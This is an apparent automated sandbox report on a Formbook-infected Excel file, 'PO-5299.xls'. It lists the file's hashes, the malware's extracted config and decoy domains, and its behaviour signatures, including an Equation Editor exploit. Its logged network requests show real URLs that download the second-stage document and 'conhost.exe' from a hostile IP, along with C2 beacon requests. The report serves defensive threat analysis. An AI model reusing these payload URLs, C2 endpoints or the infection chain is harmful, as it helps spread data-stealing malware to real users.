Analysis

  • max time kernel
    145s
  • max time network
    140s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    19/01/2024, 16:14 UTC

General

  • Target

    PO-5299.xls

  • Size

    389KB

  • MD5

    ca93ad9d9887663ed1afc2197b775268

  • SHA1

    017bb90012dfa9fd9a6a05efd01d1d929e411039

  • SHA256

    3a1b13e80cfd6e053f5a605e531c17a936a33fc5c5467e40be5a8845a2d2dbcb

  • SHA512

    02278f911322f744155b59908b13fcb69fed701230921cdf3ae041ec1beafafb24322712025498925e192922203b3325e8e7896c156a489c43e992e8d02585af

  • SSDEEP

    6144:6zcOPqGlSHBMixiMK6G+ZFrTUvCp4sJgKWQdywS26nd1WejItjFGDoo1Cz:6zBZlQpozwjTqCfgKFdyV2Qjc5GY

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

he09

Decoy

clhear.com

maythunguyen.com

xiongmaoaijia.com

kembangzadsloh.xyz

speedwagner.com

360bedroom.com

campereurorg.top

cwxg2.site

mcdlibre.live

globigprimecompanylimited.com

1707102023-stripe.com

xhfj5.site

mugiwaranousopp.xyz

texmasco.com

sc9999.net

lite.team

8xb898.com

cibecuetowing.top

mgplatinemlak.xyz

southwestharborkeyword.top

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Formbook payload 4 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Abuses OpenXML format to download file from external location
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1184
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\PO-5299.xls
      2⤵
      • Enumerates system info in registry
      • Modifies Internet Explorer settings
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      PID:2484
    • C:\Windows\SysWOW64\cmstp.exe
      "C:\Windows\SysWOW64\cmstp.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2084
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\Users\Admin\AppData\Roaming\conhost.exe"
        3⤵
          PID:1804
    • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
      1⤵
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2788
      • C:\Windows\splwow64.exe
        C:\Windows\splwow64.exe 12288
        2⤵
          PID:1500
      • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
        1⤵
        • Blocklisted process makes network request
        • Loads dropped DLL
        • Launches Equation Editor
        • Suspicious use of WriteProcessMemory
        PID:2176
        • C:\Users\Admin\AppData\Roaming\conhost.exe
          "C:\Users\Admin\AppData\Roaming\conhost.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:1972
          • C:\Users\Admin\AppData\Roaming\conhost.exe
            "C:\Users\Admin\AppData\Roaming\conhost.exe"
            3⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            PID:2992

      Network

      • flag-us
        GET
        http://172.245.208.28/wedf/wed/microsoftreturnedthrpolicytocontineutheserviceupdationfromthesystemprotocoltounderstandentireprocessfromth.doC
        EXCEL.EXE
        Remote address:
        172.245.208.28:80
        Request
        GET /wedf/wed/microsoftreturnedthrpolicytocontineutheserviceupdationfromthesystemprotocoltounderstandentireprocessfromth.doC HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
        Host: 172.245.208.28
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Date: Fri, 19 Jan 2024 16:14:13 GMT
        Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
        Last-Modified: Thu, 18 Jan 2024 14:14:10 GMT
        ETag: "10998-60f38fa36f95a"
        Accept-Ranges: bytes
        Content-Length: 67992
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: application/msword
      • flag-us
        OPTIONS
        http://172.245.208.28/wedf/wed/
        WINWORD.EXE
        Remote address:
        172.245.208.28:80
        Request
        OPTIONS /wedf/wed/ HTTP/1.1
        User-Agent: Microsoft Office Protocol Discovery
        Host: 172.245.208.28
        Content-Length: 0
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Date: Fri, 19 Jan 2024 16:14:15 GMT
        Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
        X-Powered-By: PHP/8.1.17
        Content-Length: 0
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: text/html; charset=UTF-8
      • flag-us
        HEAD
        http://172.245.208.28/wedf/wed/microsoftreturnedthrpolicytocontineutheserviceupdationfromthesystemprotocoltounderstandentireprocessfromth.doC
        WINWORD.EXE
        Remote address:
        172.245.208.28:80
        Request
        HEAD /wedf/wed/microsoftreturnedthrpolicytocontineutheserviceupdationfromthesystemprotocoltounderstandentireprocessfromth.doC HTTP/1.1
        User-Agent: Microsoft Office Existence Discovery
        Host: 172.245.208.28
        Content-Length: 0
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Date: Fri, 19 Jan 2024 16:14:19 GMT
        Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
        Last-Modified: Thu, 18 Jan 2024 14:14:10 GMT
        ETag: "10998-60f38fa36f95a"
        Accept-Ranges: bytes
        Content-Length: 67992
        Keep-Alive: timeout=5, max=99
        Connection: Keep-Alive
        Content-Type: application/msword
      • flag-us
        HEAD
        http://172.245.208.28/wedf/wed/microsoftreturnedthrpolicytocontineutheserviceupdationfromthesystemprotocoltounderstandentireprocessfromth.doC
        WINWORD.EXE
        Remote address:
        172.245.208.28:80
        Request
        HEAD /wedf/wed/microsoftreturnedthrpolicytocontineutheserviceupdationfromthesystemprotocoltounderstandentireprocessfromth.doC HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Microsoft Office Existence Discovery
        Host: 172.245.208.28
        Response
        HTTP/1.1 200 OK
        Date: Fri, 19 Jan 2024 16:14:18 GMT
        Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
        Last-Modified: Thu, 18 Jan 2024 14:14:10 GMT
        ETag: "10998-60f38fa36f95a"
        Accept-Ranges: bytes
        Content-Length: 67992
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: application/msword
      • flag-us
        GET
        http://172.245.208.28/5299/conhost.exe
        EQNEDT32.EXE
        Remote address:
        172.245.208.28:80
        Request
        GET /5299/conhost.exe HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
        Host: 172.245.208.28
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Date: Fri, 19 Jan 2024 16:14:19 GMT
        Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
        Last-Modified: Fri, 19 Jan 2024 10:22:30 GMT
        ETag: "aee00-60f49db8ce69d"
        Accept-Ranges: bytes
        Content-Length: 716288
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: application/x-msdownload
      • flag-us
        DNS
        www.neu-de-update.com
        Explorer.EXE
        Remote address:
        8.8.8.8:53
        Request
        www.neu-de-update.com
        IN A
        Response
      • flag-us
        DNS
        www.jpedwardscoaching.com
        Explorer.EXE
        Remote address:
        8.8.8.8:53
        Request
        www.jpedwardscoaching.com
        IN A
        Response
        www.jpedwardscoaching.com
        IN CNAME
        jpedwardscoaching.com
        jpedwardscoaching.com
        IN A
        3.33.130.190
        jpedwardscoaching.com
        IN A
        15.197.148.33
      • flag-us
        GET
        http://www.jpedwardscoaching.com/he09/?dZotnbmP=J0rZNCGg3B+DcYuwho5klUavYHikY0sXv/Xz31CM7w7Vqsj+/+8osxPzbs8K2wbM&SDH=7nMtdDf88J9xQhJ0
        Explorer.EXE
        Remote address:
        3.33.130.190:80
        Request
        GET /he09/?dZotnbmP=J0rZNCGg3B+DcYuwho5klUavYHikY0sXv/Xz31CM7w7Vqsj+/+8osxPzbs8K2wbM&SDH=7nMtdDf88J9xQhJ0 HTTP/1.1
        Host: www.jpedwardscoaching.com
        Connection: close
        Response
        HTTP/1.1 403 Forbidden
        Server: openresty
        Date: Fri, 19 Jan 2024 16:15:46 GMT
        Content-Type: text/html
        Content-Length: 150
        Connection: close
      • flag-us
        DNS
        www.popla9001.com
        Explorer.EXE
        Remote address:
        8.8.8.8:53
        Request
        www.popla9001.com
        IN A
        Response
      • flag-us
        DNS
        www.fino-shop.store
        Explorer.EXE
        Remote address:
        8.8.8.8:53
        Request
        www.fino-shop.store
        IN A
        Response
        www.fino-shop.store
        IN CNAME
        fino-shop.store
        fino-shop.store
        IN A
        162.240.81.18
      • flag-us
        GET
        http://www.fino-shop.store/he09/?dZotnbmP=QwDeHw0hm9ai4ucO3/tPkzm6xVUnXnh9QB1twhKxzMA6FnoKpkL4gAt396yd8siy&SDH=7nMtdDf88J9xQhJ0
        Explorer.EXE
        Remote address:
        162.240.81.18:80
        Request
        GET /he09/?dZotnbmP=QwDeHw0hm9ai4ucO3/tPkzm6xVUnXnh9QB1twhKxzMA6FnoKpkL4gAt396yd8siy&SDH=7nMtdDf88J9xQhJ0 HTTP/1.1
        Host: www.fino-shop.store
        Connection: close
        Response
        HTTP/1.1 404 Not Found
        Server: nginx/1.20.1
        Date: Fri, 19 Jan 2024 16:16:27 GMT
        Content-Type: text/html
        Content-Length: 3650
        Connection: close
        ETag: "636d2d22-e42"
      • 172.245.208.28:80
        http://172.245.208.28/wedf/wed/microsoftreturnedthrpolicytocontineutheserviceupdationfromthesystemprotocoltounderstandentireprocessfromth.doC
        http
        EXCEL.EXE
        1.9kB
        70.4kB
        32
        53

        HTTP Request

        GET http://172.245.208.28/wedf/wed/microsoftreturnedthrpolicytocontineutheserviceupdationfromthesystemprotocoltounderstandentireprocessfromth.doC

        HTTP Response

        200
      • 172.245.208.28:80
        http://172.245.208.28/wedf/wed/microsoftreturnedthrpolicytocontineutheserviceupdationfromthesystemprotocoltounderstandentireprocessfromth.doC
        http
        WINWORD.EXE
        1.1kB
        1.4kB
        16
        6

        HTTP Request

        OPTIONS http://172.245.208.28/wedf/wed/

        HTTP Response

        200

        HTTP Request

        HEAD http://172.245.208.28/wedf/wed/microsoftreturnedthrpolicytocontineutheserviceupdationfromthesystemprotocoltounderstandentireprocessfromth.doC

        HTTP Response

        200
      • 172.245.208.28:80
        http://172.245.208.28/wedf/wed/microsoftreturnedthrpolicytocontineutheserviceupdationfromthesystemprotocoltounderstandentireprocessfromth.doC
        http
        WINWORD.EXE
        510 B
        495 B
        6
        4

        HTTP Request

        HEAD http://172.245.208.28/wedf/wed/microsoftreturnedthrpolicytocontineutheserviceupdationfromthesystemprotocoltounderstandentireprocessfromth.doC

        HTTP Response

        200
      • 172.245.208.28:80
        http://172.245.208.28/5299/conhost.exe
        http
        EQNEDT32.EXE
        13.0kB
        737.8kB
        276
        530

        HTTP Request

        GET http://172.245.208.28/5299/conhost.exe

        HTTP Response

        200
      • 3.33.130.190:80
        http://www.jpedwardscoaching.com/he09/?dZotnbmP=J0rZNCGg3B+DcYuwho5klUavYHikY0sXv/Xz31CM7w7Vqsj+/+8osxPzbs8K2wbM&SDH=7nMtdDf88J9xQhJ0
        http
        Explorer.EXE
        407 B
        549 B
        5
        6

        HTTP Request

        GET http://www.jpedwardscoaching.com/he09/?dZotnbmP=J0rZNCGg3B+DcYuwho5klUavYHikY0sXv/Xz31CM7w7Vqsj+/+8osxPzbs8K2wbM&SDH=7nMtdDf88J9xQhJ0

        HTTP Response

        403
      • 162.240.81.18:80
        http://www.fino-shop.store/he09/?dZotnbmP=QwDeHw0hm9ai4ucO3/tPkzm6xVUnXnh9QB1twhKxzMA6FnoKpkL4gAt396yd8siy&SDH=7nMtdDf88J9xQhJ0
        http
        Explorer.EXE
        447 B
        4.1kB
        6
        6

        HTTP Request

        GET http://www.fino-shop.store/he09/?dZotnbmP=QwDeHw0hm9ai4ucO3/tPkzm6xVUnXnh9QB1twhKxzMA6FnoKpkL4gAt396yd8siy&SDH=7nMtdDf88J9xQhJ0

        HTTP Response

        404
      • 8.8.8.8:53
        www.neu-de-update.com
        dns
        Explorer.EXE
        67 B
        140 B
        1
        1

        DNS Request

        www.neu-de-update.com

      • 8.8.8.8:53
        www.jpedwardscoaching.com
        dns
        Explorer.EXE
        71 B
        117 B
        1
        1

        DNS Request

        www.jpedwardscoaching.com

        DNS Response

        3.33.130.190
        15.197.148.33

      • 8.8.8.8:53
        www.popla9001.com
        dns
        Explorer.EXE
        63 B
        136 B
        1
        1

        DNS Request

        www.popla9001.com

      • 8.8.8.8:53
        www.fino-shop.store
        dns
        Explorer.EXE
        65 B
        95 B
        1
        1

        DNS Request

        www.fino-shop.store

        DNS Response

        162.240.81.18

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

        Filesize

        128KB

        MD5

        a464081ab2a888e7dac6c7345551ed5c

        SHA1

        b18f174f8b9df0d7adeabb9109d16744cbaba4b1

        SHA256

        861028d264d972b8a26c496d646d52d3196d9c20091da7df5add64e1ed7467a6

        SHA512

        9c371f1ed662462ed6bc9aabd4f28b25e44fea08b194feeb8bbc293e90a59022601c7e18148222804c16574ba278c5000adccc1c7f2d54c25cd9c5990d4f8225

      • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{6B6EFF92-3AA9-420E-BDCF-33B25F175B2D}.FSD

        Filesize

        128KB

        MD5

        34a7b344eef925f5cf3cd0e58de20997

        SHA1

        30d0c5eafd3511614af679f01bb0bf36263d278f

        SHA256

        b84098c3f9e53f8c4027d1b364d0986be42c2234d8a2443c6b692d7743e0fabf

        SHA512

        c22d659c2a58bd170d432145c46c44637395b522736e7f8f1e0ecd8f683ba91bd6431a40a76397eea5eaa2e48b1f69d6bbdbde7d4261482e0d1a808ff5adb0be

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4K0WM73A\microsoftreturnedthrpolicytocontineutheserviceupdationfromthesystemprotocoltounderstandentireprocessfromth[1].doc

        Filesize

        66KB

        MD5

        0f15c2649a458ea6d0421b673571b5af

        SHA1

        a7cd0504cee1402625b1ab2bd13e89d344b3cb60

        SHA256

        19903b449b7a97eff2293836d617b509039bc4b8b108b9b5ae299f0e2a2ce9d7

        SHA512

        61ffb5b2d56bc32ee03a4e9ea70adeb5869226e92e8e4bc3d26f29c08060c8d4f5350d6fde19e26a3e536b9aaee3c24b072d7541e01c217471cd3f9f2868a1b5

      • C:\Users\Admin\AppData\Local\Temp\{A0F5974B-E08F-4667-BCFA-7D17681CCBFB}

        Filesize

        128KB

        MD5

        e796020fce52f1b4cc98c45a2ef9f1d0

        SHA1

        0417d34b24d925a06d620475c711dc422609fb79

        SHA256

        c0686db13b1074c8163a786a17cde5d4ef4193bbadf623efc008ffe2d4dbad1e

        SHA512

        4796898ac9d90231cdd3a38d31853e301d7aaa12fe4d44e19eebe70e78e10a23d4b9aec1da432c01a5a1bba73b7fc849c06f1a47f60cd68f838e43748e40b61f

      • C:\Users\Admin\AppData\Roaming\conhost.exe

        Filesize

        605KB

        MD5

        4e970a3b8f394efb6020b1d7474bc147

        SHA1

        f519d4c73cc21fed56a4e2b2ea596215f4815f4b

        SHA256

        1a96da0b8cd4b80ebbe15e9ac2e4cc3552934d5e97f80a6533f97bc66095f126

        SHA512

        e6a2b04cef50f48c5bd89002766438233945f7f705cb864aa48ace5f26ab5f257dfe9d6a3139db21105381837f21304f3d4392aef51a4e883438fa77263ac2da

      • C:\Users\Admin\AppData\Roaming\conhost.exe

        Filesize

        699KB

        MD5

        591dac333aff7739bf01a4c9d3e838a5

        SHA1

        5211f3ab4d80644439220d11fb204eb2bee9fdb8

        SHA256

        0509f94b1130c86832027f9990c3f3da9a84bc00f1462e99e8ef16a806944bb4

        SHA512

        b511a6b960b2c092577ab8fbf20767e9ad5dc86682e76e630602cfd88b4e8bf9b8fa8fac7e60fd4aa40ca8bcb49f69b9e8e9cc5a44f4c4b03d6e3d38ff402bfd

      • memory/1184-119-0x0000000003F00000-0x0000000004022000-memory.dmp

        Filesize

        1.1MB

      • memory/1184-127-0x0000000003F00000-0x0000000004022000-memory.dmp

        Filesize

        1.1MB

      • memory/1184-135-0x0000000006B10000-0x0000000006BD6000-memory.dmp

        Filesize

        792KB

      • memory/1184-132-0x0000000006B10000-0x0000000006BD6000-memory.dmp

        Filesize

        792KB

      • memory/1184-131-0x0000000006B10000-0x0000000006BD6000-memory.dmp

        Filesize

        792KB

      • memory/1184-118-0x0000000000200000-0x0000000000300000-memory.dmp

        Filesize

        1024KB

      • memory/1972-97-0x0000000001150000-0x0000000001206000-memory.dmp

        Filesize

        728KB

      • memory/1972-113-0x000000006A450000-0x000000006AB3E000-memory.dmp

        Filesize

        6.9MB

      • memory/1972-101-0x00000000002F0000-0x0000000000304000-memory.dmp

        Filesize

        80KB

      • memory/1972-98-0x000000006A450000-0x000000006AB3E000-memory.dmp

        Filesize

        6.9MB

      • memory/1972-100-0x0000000000CD0000-0x0000000000D10000-memory.dmp

        Filesize

        256KB

      • memory/1972-104-0x0000000000310000-0x0000000000318000-memory.dmp

        Filesize

        32KB

      • memory/1972-105-0x00000000004A0000-0x00000000004AC000-memory.dmp

        Filesize

        48KB

      • memory/1972-106-0x0000000005B20000-0x0000000005B8E000-memory.dmp

        Filesize

        440KB

      • memory/2084-125-0x00000000008D0000-0x0000000000963000-memory.dmp

        Filesize

        588KB

      • memory/2084-123-0x0000000000A30000-0x0000000000D33000-memory.dmp

        Filesize

        3.0MB

      • memory/2084-122-0x00000000000D0000-0x00000000000FF000-memory.dmp

        Filesize

        188KB

      • memory/2084-121-0x0000000000E90000-0x0000000000EA8000-memory.dmp

        Filesize

        96KB

      • memory/2084-120-0x0000000000E90000-0x0000000000EA8000-memory.dmp

        Filesize

        96KB

      • memory/2084-124-0x00000000000D0000-0x00000000000FF000-memory.dmp

        Filesize

        188KB

      • memory/2484-102-0x000000007208D000-0x0000000072098000-memory.dmp

        Filesize

        44KB

      • memory/2484-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

        Filesize

        64KB

      • memory/2484-9-0x0000000002D20000-0x0000000002D22000-memory.dmp

        Filesize

        8KB

      • memory/2484-1-0x000000007208D000-0x0000000072098000-memory.dmp

        Filesize

        44KB

      • memory/2788-103-0x000000007208D000-0x0000000072098000-memory.dmp

        Filesize

        44KB

      • memory/2788-4-0x000000002F701000-0x000000002F702000-memory.dmp

        Filesize

        4KB

      • memory/2788-6-0x000000007208D000-0x0000000072098000-memory.dmp

        Filesize

        44KB

      • memory/2788-8-0x0000000002490000-0x0000000002492000-memory.dmp

        Filesize

        8KB

      • memory/2992-111-0x0000000000400000-0x000000000042F000-memory.dmp

        Filesize

        188KB

      • memory/2992-114-0x0000000000910000-0x0000000000C13000-memory.dmp

        Filesize

        3.0MB

      • memory/2992-109-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

        Filesize

        4KB

      • memory/2992-108-0x0000000000400000-0x000000000042F000-memory.dmp

        Filesize

        188KB

      • memory/2992-107-0x0000000000400000-0x000000000042F000-memory.dmp

        Filesize

        188KB

      • memory/2992-117-0x0000000000250000-0x0000000000264000-memory.dmp

        Filesize

        80KB

      • memory/2992-116-0x0000000000400000-0x000000000042F000-memory.dmp

        Filesize

        188KB

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.